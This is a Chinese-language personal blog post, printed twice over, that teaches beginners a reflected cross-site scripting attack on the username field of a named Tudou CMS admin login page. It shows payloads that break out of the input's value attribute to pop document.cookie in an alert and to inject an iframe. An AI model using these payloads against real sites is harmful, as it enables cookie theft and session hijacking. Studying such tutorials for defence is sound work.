外面下大雪,奶奶的,哪里想起来上课咯。。。 冷的老子要死,我操
上午三四节课打酱油路过之后吃完东西回到寝室。。
网络小新发了我个土豆的后台,说我xss。我觉得这后台真JB有意思
这里感谢下小新哈。。。我博客的空间也是小新赞助的,嘿嘿 。。。
http://cms.tudou.com/center/system/login.do
很明显,开源的cms。。。。
那么。。我们右键查看源码
截图可能不太清楚,我这里复制下
<label>用户名:</label><input type=”text” name=”userName” value=”" id=”userName”/>
用户名的value值我们是可控的。。。
那么。构造语句。 从<input>标签开始分析下。
<input type=”text” name=”userName” value=”" ”id=”userName”/>
value=” ”
两个“ ”之间是我们写的东西
下面这么来,弹出个cookie。。(现在不是都喜欢这么来嘛 )
先把前面的<input闭合下,我这里填入1″ >
<input type=”text” name=”userName” value=” 1″ > ” id=”userName”/>
OK,这样就闭合了前面的input标签了
那么还剩下一段 “ id=”userName”/>
我们可以在中间随意的注入上我们的html代码了
这样<script>alert(document.cookie)</script>
那么。就会弹出我们想要的东东了。后面剩下的 “id=”userName”/> 会作为字符串显示在网页上、
这样 ”id=”userName”/> 被显示在了网页上了、
那么,继续把它构造完整吧。。
先整理下现在的语句。 <input type=”text” name=”userName” value=” 1″ > <script>alert(document.cookie)</script> ” id=”userName”/> 到</script>这里。。前面都构造的比较完美。
我们看看后面,
那么接下来我们想个东西来接上剩下的 “ id=”userName”/>
也就是
现在的关键只要连上这个 “ 就OK了
这样吧。。我重新加个<input>标签
这样
<input type=”text” value=”猴子好可怜
那么。连上后面的“ id=”userName”/>
整个语句也就是
<input type=”text” value=”猴子好可怜 “ id=”userName”/>
很完美的构造好了
效果是多了一行框,里面的值是猴子好可怜,现在后面不会有错误了。我们来看看 查看下源码 整条语句
用户名:</label><input type=”text” name=”userName” value=”1″><script>alert(document.cookie)</script><input type=”text” value=”猴子JJ” id=”userName”/>
我们插入的是
1″><script>alert(document.cookie)</script><input type=”text” value=”猴子JJ 当然了,在<script>这你也可以写其他的HTML标签,这个随意的只要正确就OK的、比如这里插入个网页的。用iframe吧
1″><iframe src=”http://www.sbmonkey.com” width=”500″ hight=”500″><input type=”text” value=”猴子JJ 用iframe的时候记得定义宽度和高度。不然不显示的
之所以说这个后台有意思
用户名这个input标签没有定义长度。所以说可以任意长度,最多不超过255就行,(好像是255吧) 反射型的XSS危害没有存储型的XSS危害大这个大家都知道
存储型的有些可以发展成蠕虫。(关键是看管理员的过滤),这里大学城某地方就是一个很好的例子
本篇是写给从来没接触过xss的兄弟,我觉得是个很好的例子,又没啥危害啥的。而且我感觉可以讲的比较详细,所以就拿出来讲了
只要你认真看完,就会觉得文章的精彩之前我对XSS也没有过多的看中,没啥研究,自从上次从深圳回来,发现数据流和街球以及一些基友说现在XSS比较普遍和恼火,所以才开始重视对xss的研究。我还是个新手,希望xss大神能多多带我下。。。。小弟感激不尽呀。。~以身相许、 外面下大雪,奶奶的,哪里想起来上课咯。。。
冷的老子要死,我操
上午三四节课打酱油路过之后吃完东西回到寝室。。
网络小新发了我个土豆的后台,说我xss。我觉得这后台真JB有意思
这里感谢下小新哈。。。我博客的空间也是小新赞助的,嘿嘿 。。。
http://cms.tudou.com/center/system/login.do
很明显,开源的cms。。。。
那么。。我们右键查看源码
截图可能不太清楚,我这里复制下
<label>用户名:</label><input type=”text” name=”userName” value=”" id=”userName”/>
用户名的value值我们是可控的。。。
那么。构造语句。 从<input>标签开始分析下。
<input type=”text” name=”userName” value=”" ”id=”userName”/>
value=” ”
两个“ ”之间是我们写的东西
下面这么来,弹出个cookie。。(现在不是都喜欢这么来嘛 )
先把前面的<input闭合下,我这里填入1″ >
<input type=”text” name=”userName” value=” 1″ > ” id=”userName”/>
OK,这样就闭合了前面的input标签了
那么还剩下一段 “ id=”userName”/>
我们可以在中间随意的注入上我们的html代码了
这样<script>alert(document.cookie)</script>
那么。就会弹出我们想要的东东了。后面剩下的 “id=”userName”/> 会作为字符串显示在网页上、
这样 ”id=”userName”/> 被显示在了网页上了、
那么,继续把它构造完整吧。。
先整理下现在的语句。<input type=”text” name=”userName” value=” 1″ > <script>alert(document.cookie)</script> ” id=”userName”/> 到</script>这里。。前面都构造的比较完美。
我们看看后面,
那么接下来我们想个东西来接上剩下的 “ id=”userName”/>
也就是
现在的关键只要连上这个 “ 就OK了
这样吧。。我重新加个<input>标签
这样
<input type=”text” value=”猴子好可怜
那么。连上后面的“ id=”userName”/>
整个语句也就是
<input type=”text” value=”猴子好可怜 “ id=”userName”/>
很完美的构造好了
效果是多了一行框,里面的值是猴子好可怜,现在后面不会有错误了。我们来看看查看下源码整条语句
用户名:</label><input type=”text” name=”userName” value=”1″><script>alert(document.cookie)</script><input type=”text” value=”猴子JJ” id=”userName”/>
我们插入的是
1″><script>alert(document.cookie)</script><input type=”text” value=”猴子JJ当然了,在<script>这你也可以写其他的HTML标签,这个随意的只要正确就OK的、比如这里插入个网页的。用iframe吧
1″><iframe src=”http://www.sbmonkey.com” width=”500″ hight=”500″><input type=”text” value=”猴子JJ用iframe的时候记得定义宽度和高度。不然不显示的
之所以说这个后台有意思
用户名这个input标签没有定义长度。所以说可以任意长度,最多不超过255就行,(好像是255吧)反射型的XSS危害没有存储型的XSS危害大这个大家都知道
存储型的有些可以发展成蠕虫。(关键是看管理员的过滤),这里大学城某地方就是一个很好的例子
本篇是写给从来没接触过xss的兄弟,我觉得是个很好的例子,又没啥危害啥的。而且我感觉可以讲的比较详细,所以就拿出来讲了
只要你认真看完,就会觉得文章的精彩之前我对XSS也没有过多的看中,没啥研究,自从上次从深圳回来,发现数据流和街球以及一些基友说现在XSS比较普遍和恼火,所以才开始重视对xss的研究。我还是个新手,希望xss大神能多多带我下。。。。小弟感激不尽呀。。~以身相许、
|